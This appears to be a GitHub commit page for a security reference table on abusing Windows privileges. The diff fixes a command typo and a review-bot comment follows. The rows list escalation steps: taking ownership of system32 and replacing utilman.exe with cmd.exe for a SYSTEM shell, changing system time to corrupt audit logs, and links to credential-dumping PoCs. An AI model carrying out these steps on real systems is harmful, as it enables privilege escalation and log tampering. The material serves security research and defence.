Typo in one of the commands, spotted by SchneiderSteffen.

Grzegorz Tworek 2022-09-23 09:55:00 +02:00 committed by GitHub
parent 758de4463f
commit 7ae7a718dd
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23


@ -55,7 +55,7 @@ Feel free to contribute and/or discuss presented ideas.
|`SeSystemEnvironment`| _Unknown_ | 3rd party tool | The privilege permits to use `NtSetSystemEnvironmentValue`, `NtModifyDriverEntry` and some other syscalls to manipulate UEFI variables. |The privilege is required to run sysprep.exe.<p>Additionally:<br>- Firmware environment variables were commonly used on non-Intel platforms in the past, and now slowly return to UEFI world. <br>- The area is highly undocumented.<br>- The potential may be huge (i.e. breaking Secure Boot) but raising the impact level requires at least PoC.<br> - see [PoC](https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations/SeSystemEnvironmentPrivilegePoC) by [@daem0nc0re](https://twitter.com/daem0nc0re) |
|`SeSystemProfile`| ? | ? | ? ||
|`SeSystemtime`| **Threat** | ***Built-in commands*** | `cmd.exe /c date 01-01-01`<br>`cmd.exe /c time 00:00` | The privilege allows to change the system time, potentially leading to audit trail integrity issues, as events will be stored with wrong date/time.<br>- Be careful with date/time formats. Use always-safe values if not sure.<br>- Sometimes the name of the privilege uses uppercase "T" and is referred as `SeSystemTime`. |
|`SeTakeOwnership`| ***Admin*** | ***Built-in commands*** |1. `takeown.exe /f "%windir%\system32"`<br>2. `icalcs.exe "%windir%\system32" /grant "%username%":F`<br>3. Rename cmd.exe to utilman.exe<br>4. Lock the console and press Win+U| Attack may be detected by some AV software.<br> <br>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.<br> - See [PoC](https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations/SeTakeOwnershipPrivilegePoC) by [@daem0nc0re](https://twitter.com/daem0nc0re) |
|`SeTakeOwnership`| ***Admin*** | ***Built-in commands*** |1. `takeown.exe /f "%windir%\system32"`<br>2. `icacls.exe "%windir%\system32" /grant "%username%":F`<br>3. Rename cmd.exe to utilman.exe<br>4. Lock the console and press Win+U| Attack may be detected by some AV software.<br> <br>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.<br> - See [PoC](https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations/SeTakeOwnershipPrivilegePoC) by [@daem0nc0re](https://twitter.com/daem0nc0re) |
|`SeTcb`| ***Admin*** | 3rd party tool | Manipulate tokens to have local admin rights included. | Sample code+exe creating arbitrary tokens to be found at [PsBits](https://github.com/gtworek/PSBits/tree/master/VirtualAccounts). |
|`SeTimeZone`| Mess | ***Built-in commands*** | Change the timezone. `tzutil /s "Chatham Islands Standard Time"` ||
|`SeTrustedCredManAccess`| **Threat** | 3rd party tool | Dumping credentials from Credential Manager | Great [blog post](https://www.tiraniddo.dev/2021/05/dumping-stored-credentials-with.html) by [@tiraniddo](https://twitter.com/tiraniddo).<br> - see [PoC](https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations/SeTrustedCredManAccessPrivilegePoC) by [@daem0nc0re](https://twitter.com/daem0nc0re) |
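Review bot: the `+` line changes only `icalcs.exe` to `icacls.exe` in step 2 of the `SeTakeOwnership` row and leaves the rest of the row untouched, which is the right scope for a typo fix and the corrected name matches the real tool. Two follow-ups worth a separate commit: the Notes cell for this row says only that the attack "may be detected by some AV software", but steps 1 and 2 change the owner and the DACL of `%windir%\system32`, which Windows object-access auditing can record, so the row could point defenders to those ownership/permission-change events as a detection source that does not depend on AV; and step 2 writes the grantee as `"%username%":F`, where icacls's documented form is `user:perm` (cmd strips the quotes before icacls sees the argument, so it works, but `%username%:F` is clearer for readers copying the command).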